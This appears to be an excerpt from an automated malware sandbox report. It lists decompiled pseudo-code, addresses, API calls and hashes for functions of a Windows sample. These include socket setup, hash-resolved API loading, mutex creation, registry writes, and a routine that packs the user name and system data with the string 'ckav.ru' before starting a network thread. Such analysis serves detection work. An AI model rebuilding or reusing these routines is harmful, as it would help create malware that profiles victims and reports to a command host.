                      • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404E17, Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                      Download Yara Rule
                      C-Code - Quality: 37%
                      			E00404E17(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t23;
				signed int _t24;
				signed int* _t25;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				signed int _t41;
				void* _t42;
				signed int* _t43;

				_v8 = _v8 & 0x00000000;
				_t33 = 8;
				memset( &_v40, 0, _t33 << 2);
				_v32 = 1;
				_t23 =  &_v40;
				_v28 = 6;
				_v36 = 2;
				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
				if(_t23 == 0) {
					_t24 = E00402B7C(4);
					_t43 = _t24;
					_t31 = _t30 | 0xffffffff;
					 *_t43 = _t31;
					_t41 = _v8;
					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
					 *_t43 = _t24;
					if(_t24 != _t31) {
						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
						if(_t24 == _t31) {
							E00404DE5(_t24,  *_t43);
							 *_t43 = _t31;
						}
						__imp__freeaddrinfo(_v8);
						if( *_t43 != _t31) {
							_t25 = _t43;
							goto L10;
						} else {
							E00402BAB(_t43);
							L8:
							_t25 = 0;
							L10:
							return _t25;
						}
					}
					E00402BAB(_t43);
					__imp__freeaddrinfo(_v8);
					goto L8;
				}
				return 0;
			}

















                      0x00404e1d
                      0x00404e26
                      0x00404e2a
                      0x00404e2f
                      0x00404e37
                      0x00404e3a
                      0x00404e45
                      0x00404e4f
                      0x00404e57
                      0x00404e61
                      0x00404e66
                      0x00404e68
                      0x00404e6c
                      0x00404e6e
                      0x00404e7a
                      0x00404e80
                      0x00404e84
                      0x00404e9f
                      0x00404ea7
                      0x00404eab
                      0x00404eb1
                      0x00404eb1
                      0x00404eb6
                      0x00404ebe
                      0x00404ecb
                      0x00000000
                      0x00404ec0
                      0x00404ec1
                      0x00404ec7
                      0x00404ec7
                      0x00404ecd
                      0x00000000
                      0x00404ece
                      0x00404ebe
                      0x00404e87
                      0x00404e90
                      0x00000000
                      0x00404e90
                      0x00000000

                      APIs
                      • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                      • socket.WS2_32(?,?,?), ref: 00404E7A
                      • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: freeaddrinfogetaddrinfosocket
                      • String ID:
                      • API String ID: 2479546573-0
                      • Opcode ID: c574676a76b8ab7e3a1cfe9c67dcbf8fa204d9088273f6bebccb44be350ebef6
                      • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                      • Opcode Fuzzy Hash: c574676a76b8ab7e3a1cfe9c67dcbf8fa204d9088273f6bebccb44be350ebef6
                      • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004040BB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129filememoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 74%
                      			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* _t16;
				intOrPtr* _t25;
				long* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t42;
				intOrPtr _t43;
				long _t44;
				struct _OVERLAPPED* _t46;

				_t46 = 0;
				_t35 = 0;
				E004031E5(0, 0, 0xe9fabb88, 0, 0);
				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t42 = _t16;
				_v8 = _t42;
				if(_t42 == 0xffffffff) {
					__eflags = _a12;
					if(_a12 == 0) {
						L10:
						return _t35;
					}
					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					_push(0);
					__eflags = E00403C59(_a4, _t43);
					if(__eflags != 0) {
						_v8 = 0;
						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
						_push(_t43);
						 *_a8 = _v8;
						E00403D44();
					}
					E00402BAB(_t43);
					return _t46;
				}
				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
				_t44 =  *_t25(_t42,  &_v12);
				if(_v12 != 0 || _t44 > 0x40000000) {
					L8:
					_t45 = _v8;
					goto L9;
				} else {
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 = _t44;
					}
					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
					_t35 = _t30;
					if(_t35 == 0) {
						goto L8;
					} else {
						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
						_t45 = _v8;
						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
						if(_t32 == 0) {
							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
							 *_t33(_t35, _t46, 0x8000);
							_t35 = _t46;
						}
						L9:
						E00403C40(_t45); // executed
						goto L10;
					}
				}
			}



















                      0x004040c4
                      0x004040ce
                      0x004040d0
                      0x004040e8
                      0x004040ea
                      0x004040ec
                      0x004040f2
                      0x0040418d
                      0x00404190
                      0x00404184
                      0x00000000
                      0x00404184
                      0x004041a0
                      0x004041a5
                      0x004041a7
                      0x00000000
                      0x00000000
                      0x004041a9
                      0x004041b6
                      0x004041b8
                      0x004041be
                      0x004041cb
                      0x004041d0
                      0x004041d1
                      0x004041d3
                      0x004041d8
                      0x004041dc
                      0x00000000
                      0x004041e2
                      0x00404100
                      0x0040410c
                      0x00404111
                      0x0040417a
                      0x0040417a
                      0x00000000
                      0x0040411b
                      0x0040411b
                      0x00404120
                      0x00404122
                      0x00404122
                      0x0040412c
                      0x0040413a
                      0x0040413c
                      0x00404140
                      0x00000000
                      0x00404142
                      0x0040414a
                      0x00404155
                      0x0040415a
                      0x0040415e
                      0x00404168
                      0x00404174
                      0x00404176
                      0x00404176
                      0x0040417d
                      0x0040417e
                      0x00000000
                      0x00404183
                      0x00404140

                      APIs
                      • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                      • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: File$AllocCreateReadVirtual
                      • String ID: .tmp
                      • API String ID: 3585551309-2986845003
                      • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                      • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                      • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                      • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00413866, Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON
                      Download Yara Rule
                      C-Code - Quality: 79%
                      			E00413866(void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* __ebx;
				void* __edi;
				void* _t38;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t50;
				short _t51;
				short _t52;
				short _t54;
				short _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				WCHAR* _t65;
				long _t68;
				void* _t75;
				short _t76;
				short _t78;
				short _t83;
				short _t84;
				short _t85;

				E00402C6C(_t38);
				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
				SetErrorMode(3); // executed
				_t43 = 0x4f;
				_v76 = _t43;
				_t44 = 0x4c;
				_v74 = _t44;
				_t45 = 0x45;
				_v72 = _t45;
				_t46 = 0x41;
				_v70 = _t46;
				_t47 = 0x55;
				_v68 = _t47;
				_t48 = 0x54;
				_t76 = 0x33;
				_t84 = 0x32;
				_t83 = 0x2e;
				_t78 = 0x64;
				_t85 = 0x6c;
				_v66 = _t48;
				_v52 = 0;
				_t50 = 0x77;
				_v48 = _t50;
				_t51 = 0x73;
				_v46 = _t51;
				_t52 = 0x5f;
				_v42 = _t52;
				_v28 = 0;
				_t54 = 0x6f;
				_v24 = _t54;
				_t55 = 0x65;
				_v20 = _t55;
				_v64 = _t76;
				_v62 = _t84;
				_v60 = _t83;
				_v58 = _t78;
				_v56 = _t85;
				_v54 = _t85;
				_v44 = _t84;
				_v40 = _t76;
				_v38 = _t84;
				_v36 = _t83;
				_v34 = _t78;
				_v32 = _t85;
				_v30 = _t85;
				_v22 = _t85;
				_v18 = _t76;
				_v16 = _t84;
				_v14 = _t83;
				_v12 = _t78;
				_v10 = _t85;
				_v8 = _t85;
				_v6 = 0;
				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t57( &_v76);
				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t59( &_v48);
				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				_t81 =  &_v24;
				 *_t61( &_v24); // executed
				_t63 = E00414059(); // executed
				if(_t63 != 0) {
					_t65 = E00413D97(0);
					E004031E5(0, 0, 0xcf167df4, 0, 0);
					CreateMutexW(0, 1, _t65); // executed
					_t68 = GetLastError();
					_t92 = _t68 - 0xb7;
					if(_t68 == 0xb7) {
						E00413B81(0);
						_pop(_t81); // executed
					}
					E00413003(_t92); // executed
					E00412B2E(_t92); // executed
					E00412D31(_t81, _t84); // executed
					E00413B3F();
					E00413B81(0);
					 *0x49fdd0 = 1;
				}
				return 0;
			}































































                      0x0041386f
                      0x0041387e
                      0x00413885
                      0x00413889
                      0x0041388c
                      0x00413890
                      0x00413893
                      0x00413897
                      0x0041389a
                      0x0041389e
                      0x004138a1
                      0x004138a5
                      0x004138a8
                      0x004138ac
                      0x004138af
                      0x004138b2
                      0x004138b5
                      0x004138b8
                      0x004138bb
                      0x004138bc
                      0x004138c4
                      0x004138c8
                      0x004138cb
                      0x004138cf
                      0x004138d2
                      0x004138d6
                      0x004138d7
                      0x004138df
                      0x004138e3
                      0x004138e4
                      0x004138ea
                      0x004138eb
                      0x004138f1
                      0x004138f5
                      0x004138f9
                      0x004138fd
                      0x00413901
                      0x00413905
                      0x00413909
                      0x0041390d
                      0x00413911
                      0x00413915
                      0x00413919
                      0x0041391d
                      0x00413921
                      0x00413925
                      0x00413929
                      0x0041392d
                      0x00413931
                      0x00413935
                      0x00413939
                      0x0041393d
                      0x00413941
                      0x00413950
                      0x00413959
                      0x0041395f
                      0x00413968
                      0x0041396e
                      0x00413973
                      0x00413977
                      0x00413979
                      0x00413980
                      0x00413982
                      0x00413991
                      0x0041399c
                      0x0041399e
                      0x004139a4
                      0x004139a9
                      0x004139ac
                      0x004139b1
                      0x004139b1
                      0x004139b2
                      0x004139b7
                      0x004139bc
                      0x004139c1
                      0x004139c7
                      0x004139cd
                      0x004139cd
                      0x004139db

                      APIs
                      • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                      • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                      • GetLastError.KERNEL32 ref: 0041399E
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: Error$CreateLastModeMutex
                      • String ID:
                      • API String ID: 3448925889-0
                      • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                      • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                      • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                      • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004042CF, Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v8;
				void* _t7;
				long _t10;
				void* _t21;
				struct _OVERLAPPED* _t24;

				_t14 = __ebx;
				_t24 = 0;
				_v8 = 0;
				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
				_t21 = _t7;
				if(_t21 != 0xffffffff) {
					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
					if(_t10 != 0xffffffff) {
						E004031E5(_t14, 0, 0xc148f916, 0, 0);
						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
						_t24 =  !=  ? 1 : 0;
					}
					E00403C40(_t21); // executed
				}
				return _t24;
			}








                      0x004042cf
                      0x004042d5
                      0x004042df
                      0x004042e2
                      0x004042f9
                      0x004042fb
                      0x00404300
                      0x0040430a
                      0x00404314
                      0x00404319
                      0x00404323
                      0x00404334
                      0x0040433b
                      0x0040433b
                      0x0040433f
                      0x00404344
                      0x0040434c

                      APIs
                      • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                      • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: File$CreatePointerWrite
                      • String ID:
                      • API String ID: 3672724799-0
                      • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                      • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                      • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                      • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00412D31, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON
                      Download Yara Rule
                      C-Code - Quality: 35%
                      			E00412D31(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				void* __ebx;
				intOrPtr* _t10;
				void* _t11;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t31;
				void* _t33;
				void* _t35;
				void* _t53;
				char* _t57;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t53 = __ecx;
				_t10 =  *0x49fde0;
				_t68 = _t67 - 0x24;
				 *0x49fddc = 0x927c0;
				 *0x49fde4 = 0;
				_t75 = _t10;
				if(_t10 != 0) {
					L16:
					_push(1);
					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
					_t61 = _t11;
					_t68 = _t68 + 0xc;
					if(_t61 != 0) {
						E004031E5(0, 0, 0xfcae4162, 0, 0);
						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
					}
					L004067C4(0xea60); // executed
					_pop(_t53);
				} else {
					_push(__edi);
					 *0x49fde0 = E004056BF(0x2bc);
					E00413DB7(_t53, _t75,  &_v40);
					_t57 =  &_v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004058D4( *0x49fde0, 0x12);
					E004058D4( *0x49fde0, 0x28);
					E00405872( *0x49fde0, "ckav.ru", 0, 0);
					_t69 = _t68 + 0x28;
					_t64 = E0040632F();
					_push(0);
					_push(1);
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						E00405872();
						_t70 = _t69 + 0x10;
					} else {
						_push(_t64);
						_push( *0x49fde0);
						E00405872();
						E00402BAB(_t64);
						_t70 = _t69 + 0x14;
					}
					_t58 = E00406130(_t57);
					_push(0);
					_push(1);
					_t77 = _t64;
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t25 = E00405872();
						_t71 = _t70 + 0x10; // executed
					} else {
						_push(_t58);
						_push( *0x49fde0);
						E00405872();
						_t25 = E00402BAB(_t58);
						_t71 = _t70 + 0x14;
					}
					_t26 = E004061C3(_t25, 0, _t77); // executed
					_t65 = _t26;
					_push(0);
					_push(1);
					if(_t65 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t27 = E00405872();
						_t72 = _t71 + 0x10;
					} else {
						_push(_t65);
						_push( *0x49fde0);
						E00405872();
						_t27 = E00402BAB(_t65);
						_t72 = _t71 + 0x14;
					}
					_t66 = E00406189(_t27);
					_t79 = _t66;
					if(_t66 == 0) {
						E00405781( *0x49fde0, 0);
						E00405781( *0x49fde0, 0);
						_t73 = _t72 + 0x10; // executed
					} else {
						E00405781( *0x49fde0,  *_t66);
						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
						E00402BAB(_t66);
						_t73 = _t72 + 0x14;
					}
					_t31 = E004063B2(0, _t53, _t79); // executed
					E004058D4( *0x49fde0, _t31); // executed
					_t33 = E004060BD(_t79); // executed
					E004058D4( *0x49fde0, _t33); // executed
					_t35 = E0040642C(_t79); // executed
					E004058D4( *0x49fde0, _t35);
					E004058D4( *0x49fde0, _v24);
					E004058D4( *0x49fde0, _v20);
					E004058D4( *0x49fde0, _v16);
					E004058D4( *0x49fde0, _v12);
					E00405872( *0x49fde0, E00413D97(0), 1, 0);
					_t68 = _t73 + 0x48;
				}
				_t80 =  *0x49fde4;
				if( *0x49fde4 == 0) {
					_t10 =  *0x49fde0;
					goto L16;
				}
				return E00405695(_t53,  *0x49fde0);
			}
































                      0x00412d31
                      0x00412d34
                      0x00412d39
                      0x00412d3c
                      0x00412d49
                      0x00412d50
                      0x00412d52
                      0x00412f24
                      0x00412f24
                      0x00412f2b
                      0x00412f30
                      0x00412f32
                      0x00412f37
                      0x00412f41
                      0x00412f53
                      0x00412f53
                      0x00412f5b
                      0x00412f60
                      0x00412d58
                      0x00412d58
                      0x00412d63
                      0x00412d6c
                      0x00412d73
                      0x00412d7e
                      0x00412d7f
                      0x00412d80
                      0x00412d81
                      0x00412d82
                      0x00412d8f
                      0x00412da1
                      0x00412da6
                      0x00412dae
                      0x00412db0
                      0x00412db1
                      0x00412db5
                      0x00412dce
                      0x00412dcf
                      0x00412dd5
                      0x00412dda
                      0x00412db7
                      0x00412db7
                      0x00412db8
                      0x00412dbe
                      0x00412dc4
                      0x00412dc9
                      0x00412dc9
                      0x00412de2
                      0x00412de4
                      0x00412de5
                      0x00412de7
                      0x00412de9
                      0x00412e02
                      0x00412e03
                      0x00412e09
                      0x00412e0e
                      0x00412deb
                      0x00412deb
                      0x00412dec
                      0x00412df2
                      0x00412df8
                      0x00412dfd
                      0x00412dfd
                      0x00412e11
                      0x00412e17
                      0x00412e19
                      0x00412e1a
                      0x00412e1e
                      0x00412e37
                      0x00412e38
                      0x00412e3e
                      0x00412e43
                      0x00412e20
                      0x00412e20
                      0x00412e21
                      0x00412e27
                      0x00412e2d
                      0x00412e32
                      0x00412e32
                      0x00412e4b
                      0x00412e4d
                      0x00412e4f
                      0x00412e7e
                      0x00412e8a
                      0x00412e8f
                      0x00412e51
                      0x00412e59
                      0x00412e67
                      0x00412e6d
                      0x00412e72
                      0x00412e72
                      0x00412e92
                      0x00412e9e
                      0x00412ea3
                      0x00412eaf
                      0x00412eb4
                      0x00412ec0
                      0x00412ece
                      0x00412edc
                      0x00412eea
                      0x00412ef8
                      0x00412f0f
                      0x00412f14
                      0x00412f14
                      0x00412f17
                      0x00412f1d
                      0x00412f1f
                      0x00000000
                      0x00412f1f
                      0x00412f74

                      APIs
                      • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                        • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                        • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                        • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: Heap$CreateFreeProcessThread_wmemset
                      • String ID: ckav.ru
                      • API String ID: 2915393847-2696028687
                      • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                      • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                      • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                      • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040632F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0040632F() {
				char _v8;
				void* _t4;
				void* _t7;
				void* _t16;

				_t16 = E00402B7C(0x208);
				if(_t16 == 0) {
					L4:
					_t4 = 0;
				} else {
					E0040338C(_t16, 0, 0x104);
					_t1 =  &_v8; // 0x4143e8
					_v8 = 0x208;
					_t7 = E00406069(_t16, _t1); // executed
					if(_t7 == 0) {
						E00402BAB(_t16);
						goto L4;
					} else {
						_t4 = _t16;
					}
				}
				return _t4;
			}







                      0x00406340
                      0x00406345
                      0x00406373
                      0x00406373
                      0x00406347
                      0x0040634f
                      0x00406354
                      0x00406357
                      0x0040635c
                      0x00406366
                      0x0040636d
                      0x00000000
                      0x00406368
                      0x00406368
                      0x00406368
                      0x00406366
                      0x0040637a

                      APIs
                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                      • _wmemset.LIBCMT ref: 0040634F
                        • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateNameProcessUser_wmemset
                      • String ID: CA
                      • API String ID: 2078537776-1052703068
                      • Opcode ID: c4bc171eed7e8b3d96a3baa07087eb3d6a038a3bd2a4d588b3505079e90d942a
                      • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                      • Opcode Fuzzy Hash: c4bc171eed7e8b3d96a3baa07087eb3d6a038a3bd2a4d588b3505079e90d942a
                      • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0041284A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0041284A(void* _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, int _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 2, 0xebb783d2, 0, 0);
				_t7 = SHRegSetPathW(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}





                      0x00412858
                      0x0041286c
                      0x0041286f

                      APIs
                      • SHRegSetPathW.SHLWAPI(00000000,?,00000000,-80000001,00412D05,00000002,EBB783D2,00000000,00000000,5,A,00412D05,-80000001,00000000,5,A,00000000,00000000), ref: 0041286C
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: Path
                      • String ID: 5,A
                      • API String ID: 2875597873-3842761921
                      • Opcode ID: 985f833e562fc410bf8876cb62ef75c9432edfe987e4e1d4c2e5d722ffee7efc
                      • Instruction ID: e513a9aa1dc03f827004651369457c754081445531a40a51076ab4492d9af12d
                      • Opcode Fuzzy Hash: 985f833e562fc410bf8876cb62ef75c9432edfe987e4e1d4c2e5d722ffee7efc
                      • Instruction Fuzzy Hash: 48D0C93214020DBBDF026EC1DC02F9A3F2AAB48754F004014BB18280A1D6B3A630ABA9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00406086, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 9, 0xecae3497, 0, 0);
				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}





                      0x00406094
                      0x004060a8
                      0x004060ab

                      APIs
                      • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: InformationToken
                      • String ID: IDA
                      • API String ID: 4114910276-365204570
                      • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                      • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                      • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                      • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                      Uniqueness

